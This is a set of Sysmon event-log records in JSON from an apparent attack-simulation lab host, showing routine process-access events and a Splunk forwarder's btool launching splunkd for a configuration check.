{"EventTime":"2020-08-01 06:51:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3728,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:49.370\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:49.370","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3729,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:49.370\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:49.370","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3730,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:49.370\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:49.370","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3731,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:49.370\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1105-5F25-0000-0010D2950500}\r\nTargetProcessId: 4748\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:49.370","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1105-5F25-0000-0010D2950500}","TargetProcessId":"4748","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3732,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:49.385\r\nProcessGuid: {E2A3D6B1-1105-5F25-0000-00108A960500}\r\nProcessId: 1092\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nFileVersion: 8.0.2\r\nDescription: splunkd service\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunkd.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool validate-strptime --log-warnings\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589\r\nParentProcessGuid: {E2A3D6B1-1105-5F25-0000-0010D2950500}\r\nParentProcessId: 4748\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool\" validate-strptime --log-warnings","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:51:49.385","ProcessGuid":"{E2A3D6B1-1105-5F25-0000-00108A960500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","FileVersion":"8.0.2","Description":"splunkd service","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunkd.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool validate-strptime --log-warnings","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589","ParentProcessGuid":"{E2A3D6B1-1105-5F25-0000-0010D2950500}","ParentProcessId":"4748","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool\" validate-strptime --log-warnings","EventReceivedTime":"2020-08-01 06:51:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3733,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:49.370\r\nSourceProcessGUID: {E2A3D6B1-1105-5F25-0000-0010D2950500}\r\nSourceProcessId: 4748\r\nSourceThreadId: 4744\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nTargetProcessGUID: {E2A3D6B1-1105-5F25-0000-00108A960500}\r\nTargetProcessId: 1092\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:49.370","SourceProcessGUID":"{E2A3D6B1-1105-5F25-0000-0010D2950500}","SourceProcessId":"4748","SourceThreadId":"4744","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","TargetProcessGUID":"{E2A3D6B1-1105-5F25-0000-00108A960500}","TargetProcessId":"1092","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3734,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:49.385\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1105-5F25-0000-00108A960500}\r\nTargetProcessId: 1092\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:49.385","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1105-5F25-0000-00108A960500}","TargetProcessId":"1092","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:51:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3735,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:49.385\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:49.385","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3736,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:49.385\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:49.385","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
